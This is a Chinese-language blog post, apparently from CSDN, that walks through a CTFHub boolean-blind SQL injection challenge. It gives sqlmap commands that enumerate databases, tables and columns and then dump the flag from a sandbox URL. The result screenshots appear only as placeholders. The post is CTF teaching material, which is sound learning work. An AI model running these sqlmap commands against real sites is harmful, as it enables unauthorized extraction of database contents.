布尔盲注之sqlmap爆破

布尔盲注之sqlmap爆破

—————————————————————————————
好久没有更新了,语句也忘的差不多了…。作为菜鸟的我也是终于弄懂了这道题,以及部分语句的意思。我将用尽可能详细且易理解的语言来表达。

sqlmap爆破(首先你得下载sqlmap,csdn中刚好有)

注入语句:python sqlmap.py -u"XXXXX" -batch是基本的注入框架。

一.爆破数据库的库名

输入:python sqlmap.py -u"http://challenge-cb6615ef28a95b3d.sandbox.ctfhub.com:10080/?id=1" -batch -dbs
结果:在这里插入图片描述

python sqlmap.py -u"XXX" -batch 是基本结构 XXXX表示对该URL进行注入 “-”指向所需要爆破的数据。“-dbs”指向数据库。

由图可知搜索到数据库的类型:

二.爆破当前数据库中的表名
输入:python sqlmap.py -u"http://challenge-8400f0508f0ba587.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -tables
这里“D”表示数据库,“-tables”指向爆破表名
结果:在这里插入图片描述

得出其中的两个表名flag、news。
三.爆破列名
输入:python sqlmap.py -u"http://challenge-8400f0508f0ba587.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -T"flag" -columns
“-T”表示表名,“-columns”指向爆破列名
结果:在这里插入图片描述

获得了其中的数据类型是varchar( VARCHAR(M)是一种比CHAR更加灵活的数据类型,同样用于表示字符数据,但是VARCHAR可以保存可变长度的字符串。)在这里是可变是因为这里是ctfhub中的flag每次不一样且flag是字符所以属于varchar。

四.爆破其中的数据
输入:python sqlmap.py -u"http://challenge-8400f0508f0ba587.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -T"flag" -C"flag" -dump
“C”是列名,“-dump”是导出数据的意思。
结果:在这里插入图片描述

成功获得了flag。

不熟悉的话可以去用这个去爆破sql整数型与字符型类型。
手动注入也可以去了解一下,只不过有点麻烦。

猜你喜欢

转载自blog.csdn.net/m0_52699073/article/details/113063496